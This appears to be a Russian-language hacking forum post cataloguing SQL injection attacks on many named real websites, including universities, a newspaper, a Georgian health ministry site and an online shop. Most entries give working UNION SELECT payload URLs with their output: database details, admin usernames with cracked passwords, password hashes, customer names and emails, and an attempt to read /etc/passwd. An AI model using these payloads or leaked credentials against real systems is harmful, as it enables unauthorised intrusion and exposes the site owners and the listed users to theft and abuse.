SQL Инъекции

Театральные новые известия(pr6)

Code:

http://teatr.newizv.ru/news/?IDNews=-1+union+select+1,database(),table_name,4,5,6,7,8,9,11,12--&date=2008-07-01

user() - [email protected]
database() - u10605
version() - 5.0.45-log
База данных одна с главным доменом newizv.ru (тиц-12к pr-7)
Интересные таблы

Code:

ReklamaUsers
rgn_users
users
users_
prupal_access

еще есть форум и должна быть неплохая база подписчиков

 

math.ecnu.edu.cn pr 6

Code:

http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4--

5.0.45:faculty:root@localhost

http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,file_priv,concat(user,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20from%20mysql.user--

root:07ffadcc61d6408b file_priv - Y

 

4.0.26-log:Uwww3947S@localhost:udb3947

4.1.25:antbase_eng:antbase@localhost

 

Скуля на www.relaytoday.com

Уязвимый скрипт(9 полей)
http://www.relaytoday.com/admin/previewnewsletter.php?ID=2

Список всех таблиц базы данных.
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables+--+

Список полей таблицы users
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573657273+--+

Логин/пароль
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,concat_ws(0x3a,username,password,admin),4,5,6,7,8,9+from+users+--+

Сводка по системе
Версия БД: 5.0.67-log
пользователь: wkhorse_1@localhost
Имя базы данных: wkhorse_relaytoday
ОС: apple-darwin9.0
Папка мускула: /var/mysql/

Админка
http://www.relaytoday.com/admin/

Доступа к mysql.user нет. Прав на чтение файла нет.

 

<<Антивирусная школа - Новый источник IT знаний>>

Code:

http://av-school.ru/index.php?dn=blogs&to=comment&id=9999'+Union+sElecT+concat_ws(0x2a3a2a,%27%22%3E%3Ch1%3E%27,version(),database(),user(),@@version_compile_os)--+&mp

*:*5.1.11-beta*:*kav_system*:*kavsystem@localhost*:*portbld-freebsd6.2"
--------
Powered By Danneo RCMS

 

Code:

http://www.silumin.kz/index.php?m=-259+union+select+1,2,3,version(),5,6,7,8--

Code:

http://www.football-plus.az/view_cat.php?cat=2'+and+substring(version(),1,1)=4--+

 

www.impact.org

Code:

http://www.impact.org/speakerprofile.php?id=-76+union+select+1,2,3,4,5,6,7,8--

version():5.0.67-community
user():impact_site@localhost
database():impact_devsite

 

http://www.dndrocketry.us/pages.php?id=6/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-standard
Database name: dndrock_store
User name: dndrock_dnd@localhost

http://www.warrenfarrell.com/pages.php?id=-52/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

Database Version: 4.0.25
Database name: warren
User name: warren@localhost

http://www.buenachamba.com/pages.php?id=-20%27+union+select+1,user()/*

Database Version: 5.0.22
Database name: edemodb02
User name: edemouser02@localhost

pass к adminarea
mysql хеш:5f02164e65082b3e

 

Database Version: 5.0.67-userstats-log
Database name: ideaborn_db
User name: [email protected]

Login: admin
Pass: 81dc9bdb52d04dc20036dbd8313ed055 : 1234

Database Version: 4.1.22-log
Database name: jobgoro9_pokebase
User name: jobgoro9_@localhost

email: pass
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,pass,concat_ws(0x3a,email)+from+users--

Database Version: 5.0.51a
Database name: tvlab
User name: root@localhost


Шоп Багаж

Database Version: 5.0.51a-15-log
Database name: bagazhclub
User name: u_bagazhclub@localhost


Админка:

http://bagazh-club.com.ua/admin/

name: email: pswd

test:[email protected]:3213213213
test02:[email protected]:2155456745
Иван Помидоров:[email protected]:654654654654
Федор Двинятин:[email protected]:384188998461
Сапармурат Ниязов:[email protected]:384188998461
123:[email protected]:444586395834
Федор Иванов:[email protected]:392703942157
Бла Бла:[email protected]:271963550274
Людмила:[email protected]:728109118270
Вадим:[email protected]:199490154267
Дмитрий:[email protected]:532843683176
Павел:[email protected]:886098478852
Никита:[email protected]:660344924172
Алла:[email protected]:999999992222
Олег:[email protected]:100509603544
алексей:[email protected]:335210418217
Инна:[email protected]:614732119521

 

Offshore Banking|NCB Cayman Limited
Microsoft Access

Доступа к MSysObjects как и к другим системным таблицам нету.Стоит админка,но её таблицу юзеров не подобрал.


Какой-то сайт граффити

ИТД
->user() = master@localhost

таблица admin колонки login,pdw
в итоге

Code:

admin:enter2work

Админка:

 

Скуля на сайте http://www.healthministry.ge

Логин/пароль админа
http://www.healthministry.ge/eng/archive.php?Id=1994&act=full&catId=49+and+0+union+select+1,2,3,4,concat_ws(0x3a,username,pass),6+from+moh_auth+limit+0,1+--+

Расшифровка логина/пароля:
moh:mohsmi7

Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: moh
User name: healthge@localhost

На сайте разрешено индексирование:
http://www.healthministry.ge/eng/

Привилегий на чтение файлов нет. Доступа к mysql.user нет.

 

.museum =)

Version: 5.0.45-community
User: [email protected]
Dbname: mw

 

Официальный веб-сайт МГТУ им Н.Э.Баумана
http://bmstu.ru/history_pict.php?newsid='

Version: 5.0.45
User: bmstu_admin@localhost
Name: bmstu

Из интересного:
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass+from+AdminUsers
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass+from+wwwuser

Подбор таблиц:
http://bmstu.ru/history_pict.php?newsid=22+union+select+table_name,table_schema+from+information_schema.tables+limit+39,30

Доступа к mysql.user нет.

 

Любая инъекция "дает" ксс, так что не позорься.

Code:

http://www.xyxb.cn/chem.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10

xueyuan@localhost:xueyuan:5.0.45-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Code:

http://www.grimmauldplace.ru/hb.php?id=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4

[email protected]:u161432:5.0.67-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Code:

http://bitlis.meb.gov.tr/hb.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6

[email protected]:f1300_7a2zB3mt9L84:4.0.27-log

 

http://www.bard.edu/cep/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*


Database Version: 4.0.18-standard
Database name: tools_new
User name: [email protected]

 

<<Аудио-Видио клуб>>

Code:

http://www.av-club.ru/index.php?id=98+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5--+

5.0.45:av:av@localhost:redhat-linux-gnu

Code:

http://www.av-club.ru/admin/list.php

table: site_admins
db: arlex

admins:
log: nima
pass: dontworry

Sanyok:6fbaadf9839a3389fb77f38231957e1f
test:123
gali:e10adc3949ba59abbe56e057f20f883e
admin:202cb962ac59075b964b07152d234b70

loadf_file('/etc/passwd')

 

Code:

http://www.mukeshmarwah.net/b.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7

[email protected]:mm-1967694:5.0.66a-log

 

www.cormoret.ch

Code:

http://www.cormoret.ch/pages/4.php?id=-67+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--

version():5.0.45-log
user():cormoret@localhost
database():cormoretch

 

<<Деловая махачкала>>

Code:

http://www.05info.ru/subcatalog.php?id=-322)+union+select+1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8--+

Code:

http://www.05info.ru/admin/

Powered by phpBB 2.0.21
4.1.22-log-=*=-www05inforu-=*=-j05info@localhost-=*=-portbld-freebsd6.2
-=admin=-
table: phpbb_users
username: admin
user_password: 112233445566
+limit+x,x--+ - всего 104 узвера....